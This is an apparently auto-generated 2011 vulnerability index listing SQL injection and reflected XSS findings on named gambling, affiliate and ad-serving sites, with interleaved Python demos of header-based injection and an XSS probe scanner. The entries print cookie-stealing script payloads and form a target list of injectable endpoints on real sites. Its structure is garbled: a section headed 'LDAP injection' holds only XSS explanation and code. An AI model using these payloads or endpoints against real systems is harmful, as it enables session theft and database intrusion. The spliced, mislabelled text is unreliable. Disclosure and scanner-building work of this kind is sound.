XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 16 08:24:05 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search



1. SQL injection

1.1. https://scratch.betsson.com/en/Casino/Disco-Keno [name of an arbitrarily supplied request parameter]

1.2. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya [User-Agent HTTP header]

1.3. https://scratch.betsson.com/en/Slots/Fantasia [site cookie]

1.4. https://scratch.betsson.com/en/Sports/Bowling [User-Agent HTTP header]

1.5. https://scratch.betsson.com/en/Sports/World-Champions [Referer HTTP header]

1.6. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 1]

1.7. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 2]

1.8. http://scratch.co.uk/resources/style.css [REST URL parameter 1]

1.9. http://scratch.co.uk/resources/style.css [REST URL parameter 2]

1.10. http://trk.primescratchcards.com/ [ac parameter]

1.11. http://www.interwetten.org/ [Referer HTTP header]

1.12. http://www.neogames.com/our-partners [name of an arbitrarily supplied request parameter]

1.13. http://www.neogames.com/outbound/article/www.bet365.com [name of an arbitrarily supplied request parameter]

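The entries above show injection reaching the database from request headers (User-Agent, Referer) and from a cookie, not only from query parameters. As an added example, not code from the XSS.CX report or from any of the sites listed, the following Python builds a constructed visit-log handler in two versions, one that splices header values into the SQL text and one that binds them as parameters, and runs the scanner-style single-quote / doubled-quote check against each. The table, the handler names and the check itself are assumptions made for the illustration.

```python
import sqlite3


def make_db():
    """Constructed demo schema: a visit log of the kind many sites keep for
    analytics. It stores User-Agent and Referer, which makes those headers
    database input just like any query parameter."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (path TEXT, user_agent TEXT, referer TEXT)")
    return conn


def log_visit_vulnerable(conn, path, headers):
    # The defect: header values are spliced into the statement text, so a
    # quote in User-Agent or Referer changes the SQL the parser sees.
    sql = "INSERT INTO visits VALUES ('%s', '%s', '%s')" % (
        path, headers.get("User-Agent", ""), headers.get("Referer", ""))
    conn.execute(sql)


def log_visit_safe(conn, path, headers):
    # The fix: bound parameters. The values never reach the SQL parser.
    conn.execute(
        "INSERT INTO visits VALUES (?, ?, ?)",
        (path, headers.get("User-Agent", ""), headers.get("Referer", "")),
    )


def handle(logger, path, headers):
    """Toy request handler: 200 on success, 500 when the database raises,
    which is all a scanner can see from the outside."""
    conn = make_db()
    try:
        logger(conn, path, headers)
        return 200
    except sqlite3.DatabaseError:
        return 500
    finally:
        conn.close()


def find_header_sqli(logger, path="/", header_names=("User-Agent", "Referer")):
    """Scanner-style check per header: one quote should break a string
    literal (error) and a doubled quote should repair it (no error). Only
    headers showing that exact pattern are reported, which rules out
    endpoints that simply fail on any unusual input."""
    findings = []
    for name in header_names:
        base = {n: "Mozilla/5.0" for n in header_names}
        baseline = handle(logger, path, base)
        broken = handle(logger, path, {**base, name: "Mozilla/5.0'"})
        repaired = handle(logger, path, {**base, name: "Mozilla/5.0''"})
        if baseline == 200 and broken == 500 and repaired == 200:
            findings.append("%s [%s HTTP header]" % (path, name))
    return findings


if __name__ == "__main__":
    print(find_header_sqli(log_visit_vulnerable))  # both headers reported
    print(find_header_sqli(log_visit_safe))        # nothing reported
```

Running `find_header_sqli(log_visit_vulnerable)` reports both headers; the parameterised version reports none. The vector matters for exploitability: User-Agent and Referer are set by whoever sends the request, so a header-sourced SQL injection is exploitable by the attacker's own client with no victim involved, and the payload never appears in the query string that access logs and reviewers look at first.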
2. LDAP injection

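Each entry in the next section names the input vector the probe was placed in (a named query parameter, a cookie such as BO or RegistrationMode, a request header) or, for "name of an arbitrarily supplied request parameter", the probe used as the parameter name itself. Several entries show the probe verbatim: a short random hex prefix and suffix around the payload, which is `"><script>alert(document.cookie)</script>` once URL-decoded. As an added example, not code from the report or from any listed site, the following Python reproduces that method offline against a constructed lobby page. The page, its parameter and cookie names, and the exact probe format are assumptions modelled on the labels in the index.

```python
import html
import secrets
from urllib.parse import parse_qs, quote, urlsplit

# URL-decoded form of the probe payload shown in the index entries.
PAYLOAD = '"><script>alert(document.cookie)</script>'
KNOWN_PARAMS = {"CUR", "PRD"}   # assumed parameter set of the constructed page


def make_probe(payload=PAYLOAD):
    """Wrap the payload in random hex markers so a reflection can be located
    unambiguously and told apart from any copy of the payload the page
    already contains (the index shows the same prefix/suffix pattern)."""
    return secrets.token_hex(3) + payload + secrets.token_hex(5)


def lobby_app(request):
    """Constructed stand-in for a lobby page (no vendor's code). It reflects
    one parameter and one cookie unencoded, echoes unknown parameter names,
    escapes the lang cookie correctly and drops User-Agent into a comment."""
    qs = parse_qs(urlsplit(request["url"]).query, keep_blank_values=True)
    cookies, headers = request["cookies"], request["headers"]
    cur = qs.get("CUR", [""])[0]
    bo = cookies.get("BO", "")
    lang = cookies.get("lang", "en")
    ua = headers.get("User-Agent", "")
    unknown = [n for n in qs if n not in KNOWN_PARAMS]
    parts = [
        '<html lang="%s">' % html.escape(lang, quote=True),     # encoded: safe
        '<input name="CUR" value="%s">' % cur,                   # raw: vulnerable
        '<a href="/lobby?BO=%s">brand</a>' % bo,                 # raw: vulnerable
        '<!-- client: %s -->' % ua,                              # raw, inside a comment
    ]
    if unknown:
        parts.append("<p>Unknown option: %s</p>" % ", ".join(unknown))  # raw
    return "\n".join(parts)


def scan(app, base_url, params, cookies, headers):
    """Inject one fresh probe per input vector and report, in the index's
    label format, every vector whose probe comes back verbatim."""
    vectors = ([("parameter", p) for p in params]
               + [("name of an arbitrarily supplied request parameter", None)]
               + [("cookie", c) for c in cookies]
               + [("HTTP header", h) for h in headers])
    hits = []
    for kind, name in vectors:
        probe = make_probe()
        req = {"url": base_url, "cookies": {}, "headers": {}}
        if kind == "parameter":
            req["url"] = "%s?%s=%s" % (base_url, quote(name, safe=""), quote(probe, safe=""))
        elif name is None:                       # probe as the parameter name
            req["url"] = "%s?%s=1" % (base_url, quote(probe, safe=""))
        elif kind == "cookie":
            req["cookies"][name] = probe
        else:
            req["headers"][name] = probe
        body = app(req)
        if probe in body:                        # verbatim: no output encoding
            label = kind if name is None else "%s %s" % (name, kind)
            hits.append("%s [%s]" % (base_url, label))
    return hits


if __name__ == "__main__":
    for hit in scan(lobby_app, "https://example.test/lobby",
                    ["CUR", "PRD"], ["BO", "lang"], ["User-Agent", "Referer"]):
        print(hit)
```

The check is syntactic: a verbatim copy of the probe in the response means no output encoding was applied to that vector. The User-Agent hit lands inside an HTML comment, where the payload does not execute unless it can also close the comment, so each hit still needs its reflection context read by hand before it is rated; the lang cookie, escaped with `html.escape`, produces no hit, and PRD, which the page never echoes, produces none either.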
3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

3.2. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

3.3. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

3.4. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

3.5. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

3.6. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

3.7. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

3.8. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

3.9. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

3.10. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

3.11. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

3.12. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

3.13. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

3.14. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

3.15. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

3.16. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

3.17. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

3.18. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

3.19. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

3.20. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

3.21. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

3.22. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

3.23. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

3.24. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.26. http://bid.openx.net/json [c parameter]

3.27. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

3.28. http://scratch.co.uk/ [currency parameter]

3.29. http://scratch.co.uk/ [currency parameter]

3.30. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter]

3.31. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter]

3.32. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter]

3.33. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter]

3.34. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

3.35. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

3.36. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter]

3.37. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter]

3.38. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter]

3.39. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter]

3.40. http://trk.primescratchcards.com/ [ac parameter]

3.41. https://www.aspireaffiliates.com/ [CMI parameter]

3.42. https://www.aspireaffiliates.com/ [CMI parameter]

3.43. https://www.aspireaffiliates.com/ [CMI parameter]

3.44. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.45. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.46. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.47. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.48. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.49. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.50. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter]

3.51. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.52. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.53. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.54. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [name of an arbitrarily supplied request parameter]

3.55. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.56. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.57. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.58. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.59. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.60. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.61. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.62. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.63. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.64. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.65. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.66. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.67. http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter]

3.68. http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter]

3.69. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

3.70. http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter]

3.71. http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter]

3.72. http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter]

3.73. http://www.okscratchcards.com/terms-and-conditions.aspx [name of an arbitrarily supplied request parameter]

3.74. http://www.primescratchcards.com/index.asp [curr parameter]

3.75. http://www.primescratchcards.com/index.asp [curr parameter]

3.76. http://ad.yieldmanager.com/imp [Referer HTTP header]

3.77. https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header]

3.78. http://home.okscratchcards.com/AboutUs.aspx [BO cookie]

3.79. http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie]

3.80. http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie]

3.81. http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie]

3.82. http://home.okscratchcards.com/FairPlay.aspx [BO cookie]

3.83. http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie]

3.84. http://home.okscratchcards.com/PlayersClub.aspx [BO cookie]

3.85. http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie]

3.86. http://home.okscratchcards.com/Promotions.aspx [BO cookie]

3.87. http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie]

3.88. http://home.okscratchcards.com/Responsible.aspx [BO cookie]

3.89. http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie]

3.90. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie]

3.91. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.92. http://home.okscratchcards.com/Terms.aspx [BO cookie]

3.93. http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie]

3.94. http://home.okscratchcards.com/help.aspx [BO cookie]

3.95. http://home.okscratchcards.com/help.aspx [RegistrationMode cookie]

3.96. http://okscratchcards.com/ [name of an arbitrarily supplied request parameter]

3.97. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.98. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.99. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.100. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.101. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.102. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.103. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.104. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.105. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.106. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.107. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.108. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.109. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.110. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.111. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.112. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.113. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.114. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.115. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.116. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.117. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.118. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.119. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.120. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.121. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.122. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.123. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.124. http://primescratchcards.com/images/help.asp [ARC cookie]

3.125. http://primescratchcards.com/images/help.asp [ARC cookie]

3.126. http://primescratchcards.com/images/help.asp [ARC cookie]

3.127. http://primescratchcards.com/images/index.asp [ARC cookie]

3.128. http://primescratchcards.com/images/index.asp [ARC cookie]

3.129. http://primescratchcards.com/images/index.asp [ARC cookie]

3.130. http://primescratchcards.com/images/media.asp [ARC cookie]

3.131. http://primescratchcards.com/images/media.asp [ARC cookie]

3.132. http://primescratchcards.com/images/media.asp [ARC cookie]

3.133. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.134. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.135. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.136. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.137. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.138. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.139. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.140. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.141. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.142. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.143. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.144. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.145. http://scratch.co.uk/ [affiliate cookie]

3.146. http://scratch.co.uk/ [affiliate cookie]

3.147. http://scratch.co.uk/ [currency cookie]

3.148. http://scratch.co.uk/ [currency cookie]

3.149. http://scratch.co.uk/ [currency cookie]

3.150. http://scratch.co.uk/ [currency cookie]

3.151. http://scratch.co.uk/ [lang cookie]

3.152. http://scratch.co.uk/ [lang cookie]

3.153. http://scratch.co.uk/ [neogamesemail cookie]

3.154. http://scratch.co.uk/about/ [affiliate cookie]

3.155. http://scratch.co.uk/about/ [currency cookie]

3.156. http://scratch.co.uk/about/ [lang cookie]

3.157. http://scratch.co.uk/contact/ [affiliate cookie]

3.158. http://scratch.co.uk/contact/ [currency cookie]

3.159. http://scratch.co.uk/contact/ [lang cookie]

3.160. http://scratch.co.uk/help/ [affiliate cookie]

3.161. http://scratch.co.uk/help/ [currency cookie]

3.162. http://scratch.co.uk/help/ [lang cookie]

3.163. http://scratch.co.uk/help/deposit/methods/ [affiliate cookie]

3.164. http://scratch.co.uk/help/deposit/methods/ [currency cookie]

3.165. http://scratch.co.uk/help/deposit/methods/ [lang cookie]

3.166. http://scratch.co.uk/help/fairplay/ [affiliate cookie]

3.167. http://scratch.co.uk/help/fairplay/ [currency cookie]

3.168. http://scratch.co.uk/help/fairplay/ [lang cookie]

3.169. http://scratch.co.uk/help/privacy/ [affiliate cookie]

3.170. http://scratch.co.uk/help/privacy/ [currency cookie]

3.171. http://scratch.co.uk/help/privacy/ [lang cookie]

3.172. http://scratch.co.uk/invite-friend/ [affiliate cookie]

3.173. http://scratch.co.uk/invite-friend/ [currency cookie]

3.174. http://scratch.co.uk/invite-friend/ [lang cookie]

3.175. http://scratch.co.uk/over-18/ [affiliate cookie]

3.176. http://scratch.co.uk/over-18/ [currency cookie]

3.177. http://scratch.co.uk/over-18/ [lang cookie]

3.178. http://scratch.co.uk/problem-gambling/ [affiliate cookie]

3.179. http://scratch.co.uk/problem-gambling/ [currency cookie]

3.180. http://scratch.co.uk/problem-gambling/ [lang cookie]

3.181. http://scratch.co.uk/promotions/ [affiliate cookie]

3.182. http://scratch.co.uk/promotions/ [currency cookie]

3.183. http://scratch.co.uk/promotions/ [lang cookie]

3.184. http://scratch.co.uk/promotions/argos/ [affiliate cookie]

3.185. http://scratch.co.uk/promotions/argos/ [currency cookie]

3.186. http://scratch.co.uk/promotions/argos/ [currency cookie]

3.187. http://scratch.co.uk/promotions/argos/ [lang cookie]

3.188. http://scratch.co.uk/terms/ [affiliate cookie]

3.189. http://scratch.co.uk/terms/ [currency cookie]

3.190. http://scratch.co.uk/terms/ [lang cookie]

3.191. http://scratch.co.uk/vis-club/ [affiliate cookie]

3.192. http://scratch.co.uk/vis-club/ [currency cookie]

3.193. http://scratch.co.uk/vis-club/ [lang cookie]

3.194. http://scratch.co.uk/winners/ [affiliate cookie]

3.195. http://scratch.co.uk/winners/ [currency cookie]

3.196. http://scratch.co.uk/winners/ [lang cookie]

3.197. http://www.bigmoneyscratch.com/AboutUs.aspx [BO cookie]

3.198. http://www.bigmoneyscratch.com/AboutUs.aspx [RegistrationMode cookie]

3.199. http://www.bigmoneyscratch.com/Affiliates.aspx [BO cookie]

3.200. http://www.bigmoneyscratch.com/Affiliates.aspx [RegistrationMode cookie]

3.201. http://www.bigmoneyscratch.com/ContactUsChat.aspx [BO cookie]

3.202. http://www.bigmoneyscratch.com/ContactUsChat.aspx [RegistrationMode cookie]

3.203. http://www.bigmoneyscratch.com/ContactUsFax.aspx [BO cookie]

3.204. http://www.bigmoneyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]

3.205. http://www.bigmoneyscratch.com/ContactUsMail.aspx [BO cookie]

3.206. http://www.bigmoneyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]

3.207. http://www.bigmoneyscratch.com/ContactUsTel.aspx [BO cookie]

3.208. http://www.bigmoneyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]

3.209. http://www.bigmoneyscratch.com/FAQ.aspx [BO cookie]

3.210. http://www.bigmoneyscratch.com/FAQ.aspx [RegistrationMode cookie]

3.211. http://www.bigmoneyscratch.com/FairPlay.aspx [BO cookie]

3.212. http://www.bigmoneyscratch.com/FairPlay.aspx [RegistrationMode cookie]

3.213. http://www.bigmoneyscratch.com/Help.aspx [BO cookie]

3.214. http://www.bigmoneyscratch.com/Help.aspx [RegistrationMode cookie]

3.215. http://www.bigmoneyscratch.com/Home.aspx [BO cookie]

3.216. http://www.bigmoneyscratch.com/Home.aspx [RegistrationMode cookie]

3.217. http://www.bigmoneyscratch.com/InviteFriend.aspx [BO cookie]

3.218. http://www.bigmoneyscratch.com/InviteFriend.aspx [RegistrationMode cookie]

3.219. http://www.bigmoneyscratch.com/Mobile.aspx [BO cookie]

3.220. http://www.bigmoneyscratch.com/Mobile.aspx [RegistrationMode cookie]

3.221. http://www.bigmoneyscratch.com/PlayersClub.aspx [BO cookie]

3.222. http://www.bigmoneyscratch.com/PlayersClub.aspx [RegistrationMode cookie]

3.223. http://www.bigmoneyscratch.com/Promotions.aspx [BO cookie]

3.224. http://www.bigmoneyscratch.com/Promotions.aspx [RegistrationMode cookie]

3.225. http://www.bigmoneyscratch.com/Responsible.aspx [BO cookie]

3.226. http://www.bigmoneyscratch.com/Responsible.aspx [RegistrationMode cookie]

3.227. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [BO cookie]

3.228. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.229. http://www.bigmoneyscratch.com/Terms.aspx [BO cookie]

3.230. http://www.bigmoneyscratch.com/Terms.aspx [RegistrationMode cookie]

3.231. http://www.bigmoneyscratch.com/UnderAge.aspx [BO cookie]

3.232. http://www.bigmoneyscratch.com/UnderAge.aspx [RegistrationMode cookie]

3.233. http://www.hopa.com/ [BO cookie]

3.234. http://www.hopa.com/ [RegistrationMode cookie]

3.235. http://www.info.crazyscratch.com/AboutUs.aspx [BO cookie]

3.236. http://www.info.crazyscratch.com/AboutUs.aspx [RegistrationMode cookie]

3.237. http://www.info.crazyscratch.com/ContactUsFax.aspx [BO cookie]

3.238. http://www.info.crazyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]

3.239. http://www.info.crazyscratch.com/ContactUsMail.aspx [BO cookie]

3.240. http://www.info.crazyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]

3.241. http://www.info.crazyscratch.com/ContactUsTel.aspx [BO cookie]

3.242. http://www.info.crazyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]

3.243. http://www.info.crazyscratch.com/FairPlay.aspx [BO cookie]

3.244. http://www.info.crazyscratch.com/FairPlay.aspx [RegistrationMode cookie]

3.245. http://www.info.crazyscratch.com/Help.aspx [BO cookie]

3.246. http://www.info.crazyscratch.com/Help.aspx [RegistrationMode cookie]

3.247. http://www.info.crazyscratch.com/InviteFriend.aspx [BO cookie]

3.248. http://www.info.crazyscratch.com/InviteFriend.aspx [RegistrationMode cookie]

3.249. http://www.info.crazyscratch.com/PlayersClub.aspx [BO cookie]

3.250. http://www.info.crazyscratch.com/PlayersClub.aspx [RegistrationMode cookie]

3.251. http://www.info.crazyscratch.com/Privacy.aspx [BO cookie]

3.252. http://www.info.crazyscratch.com/Privacy.aspx [RegistrationMode cookie]

3.253. http://www.info.crazyscratch.com/Promotions.aspx [BO cookie]

3.254. http://www.info.crazyscratch.com/Promotions.aspx [RegistrationMode cookie]

3.255. http://www.info.crazyscratch.com/Responsible.aspx [BO cookie]

3.256. http://www.info.crazyscratch.com/Responsible.aspx [RegistrationMode cookie]

3.257. http://www.info.crazyscratch.com/Terms.aspx [BO cookie]

3.258. http://www.info.crazyscratch.com/Terms.aspx [RegistrationMode cookie]

3.259. http://www.info.crazyscratch.com/UnderAge.aspx [BO cookie]

3.260. http://www.info.crazyscratch.com/UnderAge.aspx [RegistrationMode cookie]

3.261. http://www.karamba.com/ [BO cookie]

3.262. http://www.karamba.com/ [RegistrationMode cookie]

3.263. http://www.karamba.com/AboutUs.aspx [BO cookie]

3.264. http://www.karamba.com/AboutUs.aspx [RegistrationMode cookie]

3.265. http://www.karamba.com/FairPlay.aspx [BO cookie]

3.266. http://www.karamba.com/FairPlay.aspx [RegistrationMode cookie]

3.267. http://www.karamba.com/Help.aspx [BO cookie]

3.268. http://www.karamba.com/Help.aspx [RegistrationMode cookie]

3.269. http://www.karamba.com/Home.aspx [BO cookie]

3.270. http://www.karamba.com/Home.aspx [RegistrationMode cookie]

3.271. http://www.karamba.com/InviteFriend.aspx [BO cookie]

3.272. http://www.karamba.com/InviteFriend.aspx [RegistrationMode cookie]

3.273. http://www.karamba.com/PlayersClub.aspx [BO cookie]

3.274. http://www.karamba.com/PlayersClub.aspx [RegistrationMode cookie]

3.275. http://www.karamba.com/Privacy.aspx [BO cookie]

3.276. http://www.karamba.com/Privacy.aspx [RegistrationMode cookie]

3.277. http://www.karamba.com/Promotions.aspx [BO cookie]

3.278. http://www.karamba.com/Promotions.aspx [RegistrationMode cookie]

3.279. http://www.karamba.com/Responsible.aspx [BO cookie]

3.280. http://www.karamba.com/Responsible.aspx [RegistrationMode cookie]

3.281. http://www.karamba.com/Sitemap.aspx [BO cookie]

3.282. http://www.karamba.com/Sitemap.aspx [RegistrationMode cookie]

3.283. http://www.karamba.com/Terms.aspx [BO cookie]

3.284. http://www.karamba.com/Terms.aspx [RegistrationMode cookie]

3.285. http://www.karamba.com/UnderAge.aspx [BO cookie]

3.286. http://www.karamba.com/UnderAge.aspx [RegistrationMode cookie]

3.287. http://www.karamba.com/click/Karamba.com/ENG/Home/ [BO cookie]

3.288. http://www.karamba.com/click/Karamba.com/ENG/Home/ [RegistrationMode cookie]

3.289. http://www.mundirasca.com/ [BO cookie]

3.290. http://www.mundirasca.com/ [RegistrationMode cookie]

3.291. http://www.mundirasca.com/AboutUs.aspx [BO cookie]

3.292. http://www.mundirasca.com/AboutUs.aspx [RegistrationMode cookie]

3.293. http://www.mundirasca.com/ContactUsChat.aspx [BO cookie]

3.294. http://www.mundirasca.com/ContactUsChat.aspx [RegistrationMode cookie]

3.295. http://www.mundirasca.com/ContactUsFax.aspx [BO cookie]

3.296. http://www.mundirasca.com/ContactUsFax.aspx [RegistrationMode cookie]

3.297. http://www.mundirasca.com/ContactUsMail.aspx [BO cookie]

3.298. http://www.mundirasca.com/ContactUsMail.aspx [RegistrationMode cookie]

3.299. http://www.mundirasca.com/ContactUsTel.aspx [BO cookie]

3.300. http://www.mundirasca.com/ContactUsTel.aspx [RegistrationMode cookie]

3.301. http://www.mundirasca.com/FAQ.aspx [BO cookie]

3.302. http://www.mundirasca.com/FAQ.aspx [RegistrationMode cookie]

3.303. http://www.mundirasca.com/FairPlay.aspx [BO cookie]

3.304. http://www.mundirasca.com/FairPlay.aspx [RegistrationMode cookie]

3.305. http://www.mundirasca.com/Help.aspx [BO cookie]

3.306. http://www.mundirasca.com/Help.aspx [RegistrationMode cookie]

3.307. http://www.mundirasca.com/InviteFriend.aspx [BO cookie]

3.308. http://www.mundirasca.com/InviteFriend.aspx [RegistrationMode cookie]

3.309. http://www.mundirasca.com/PlayersClub.aspx [BO cookie]

